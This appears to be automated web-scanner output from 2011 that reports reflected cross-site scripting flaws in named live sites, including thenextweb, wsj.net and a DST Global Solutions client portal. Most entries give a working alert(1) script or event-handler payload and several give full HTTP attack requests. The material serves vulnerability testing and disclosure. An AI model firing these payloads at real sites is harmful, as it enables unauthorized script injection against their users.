This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ht request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c02f"><script>alert(1)</script>e7d61d5c8f5 was submitted in the ht parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ibs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcdd5"><script>alert(1)</script>30efd1cf622 was submitted in the ibs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the poo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39283"><script>alert(1)</script>c1c0b3a1f05 was submitted in the poo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98b84"><script>alert(1)</script>1a58b06938f was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 630a0"><script>alert(1)</script>8680e005f04 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf75"><script>alert(1)</script>82dd5aa6d77 was submitted in the st parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a6c"><script>alert(1)</script>c83276f8e05 was submitted in the stid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4658b"><script>alert(1)</script>8afd7eebac2 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f78f2"><script>alert(1)</script>a9e45e493c5 was submitted in the wh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 57262<script>alert(1)</script>69a836d822e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 2eb65<script>alert(1)</script>e135a45addd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9fa76<script>alert(1)</script>d9b292fdfe2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8f927<script>alert(1)</script>18743ec238e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b3bf<script>alert(1)</script>03c12efd9cd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 6f66a<script>alert(1)</script>43bf8311a42 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload bd710<script>alert(1)</script>074d9a138e3 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6c111<script>alert(1)</script>7afe3df289e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the max_followers request parameter is copied into the HTML document as plain text between tags. The payload afc43<script>alert(1)</script>4d89496ca7d was submitted in the max_followers parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
{"msg": "Unable to convert parameter 'max_followers': invalid literal for int() with base 10: '10afc43<script>alert(1)</script>4d89496ca7d'", "status": "error", "code": 400}
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54636<script>alert(1)</script>ac5c7dfe9fc was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1.1/public/init.js?callback=LF.initCallback54636<script>alert(1)</script>ac5c7dfe9fc&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1 Host: bootstrap.thenextweb.fyre.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the site_id request parameter is copied into the HTML document as plain text between tags. The payload a3092<script>alert(1)</script>9b6aa7e9a44 was submitted in the site_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1.1/public/init.js?callback=LF.initCallback&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775a3092<script>alert(1)</script>9b6aa7e9a44&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1 Host: bootstrap.thenextweb.fyre.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
LF.initCallback({"msg": "Unable to convert parameter 'site_id': invalid literal for int() with base 10: '289775a3092<script>alert(1)</script>9b6aa7e9a44'", "status": "error", "code": 400});
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f2672<script>alert(1)</script>5e44580f52b was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1.1/public/init.js?callback=LF.initCallback&url=f2672<script>alert(1)</script>5e44580f52b&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1 Host: bootstrap.thenextweb.fyre.co Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 37c51<script>alert(1)</script>d62efdff90b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10 was submitted in the absolutePath parameter. This input was echoed as 19ab8<img src=a onerror=alert(1)>f0332744d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1 Host: cc.wsj.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://blogs.wsj.com/venturecapital/?mod=tech Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Restlet-Framework/2.0.3 Accept-Ranges: bytes Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept Content-Type: application/x-javascript P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC X-DEBUG-EMGSESSIONID: NULL Date: Wed, 05 Oct 2011 21:11:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 255121
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ce8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb was submitted in the c parameter. This input was echoed as ce8ce<img src=a onerror=alert(1)>000d54995fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOnece8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb HTTP/1.1 Host: cc.wsj.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: */* Referer: http://blogs.wsj.com/venturecapital/?mod=tech Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Restlet-Framework/2.0.3 Accept-Ranges: bytes Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept Content-Type: application/x-javascript P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC X-DEBUG-EMGSESSIONID: NULL Date: Wed, 05 Oct 2011 21:12:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 255121
The value of the site request parameter is copied into the HTML document as plain text between tags. The payload fc5e3<script>alert(1)</script>85758782c82 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Content-Type: text/javascript P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC" Server: TornadoServer/1.2 X-Config-Cache: Miss X-Request-Time: D=8156 t=1317838794651252 X-Served-By: logger-b005.krxd.net Content-Length: 97 Date: Wed, 05 Oct 2011 18:19:54 GMT Connection: close
{"error": "Non existant site for NBCU - nbcnewyork.comfc5e3<script>alert(1)</script>85758782c82"}
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f823</script><script>alert(1)</script>c8ab89aca16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9191</script><script>alert(1)</script>ac3d12fa4c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b58d0</script><script>alert(1)</script>6d865618bfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d8ce</script><script>alert(1)</script>50879ddfa23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b1a7</script><script>alert(1)</script>b86cea24919 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549bd</script><script>alert(1)</script>5f79a462611 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13602</script><script>alert(1)</script>bb3f400fab5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9ab6</script><script>alert(1)</script>3a004a720e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34f5b</script><script>alert(1)</script>1c9d2aad0c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4f70</script><script>alert(1)</script>a826a25cbfe was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1041</script><script>alert(1)</script>c2ae652104c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21bcc</script><script>alert(1)</script>54d465d8e71 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a656</script><script>alert(1)</script>934b12ee9b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfc65</script><script>alert(1)</script>4f0124b7488 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9164</script><script>alert(1)</script>1115affc524 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca7f8</script><script>alert(1)</script>fda5be8e479 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6556</script><script>alert(1)</script>666a0cab711 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a456</script><script>alert(1)</script>c82b48ce1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78e52</script><script>alert(1)</script>67217806899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76aa</script><script>alert(1)</script>8a6504a518d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6d3</script><script>alert(1)</script>577051df666 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2a63</script><script>alert(1)</script>9807f8e6f38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.87. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ca7'-alert(1)-'6f3146d22d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.88. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dfa2"><script>alert(1)</script>f11387889d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fc4'-alert(1)-'3f3ecb669ce was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d41"><script>alert(1)</script>17cc96b90c8 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d1e"><script>alert(1)</script>79ae44372ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2801'%3bb3bb804ad0e was submitted in the REST URL parameter 2. This input was echoed as e2801';b3bb804ad0e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.93. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/forgotpw
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb440"><script>alert(1)</script>374bab39861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.94. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/forgotpw
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784f0'-alert(1)-'f511029aa62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c82'-alert(1)-'746a4e367a2 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56101"><script>alert(1)</script>b1838b56821 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd424'%3b10098646869 was submitted in the REST URL parameter 2. This input was echoed as fd424';10098646869 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8450"><script>alert(1)</script>936174fc4c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.99. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/forgotusername
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 786d3'-alert(1)-'5d32a6e71ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.100. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://clientcentre.dstglobalsolutions.com
Path:
/Registration.nsf/forgotusername
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb5"><script>alert(1)</script>bd544f0e119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d6b9'-alert(1)-'068c4f3ccc4 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 947c9"><script>alert(1)</script>9e8695274cb was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b400f'%3b53b1fc092ed was submitted in the REST URL parameter 2. This input was echoed as b400f';53b1fc092ed in the application's response.
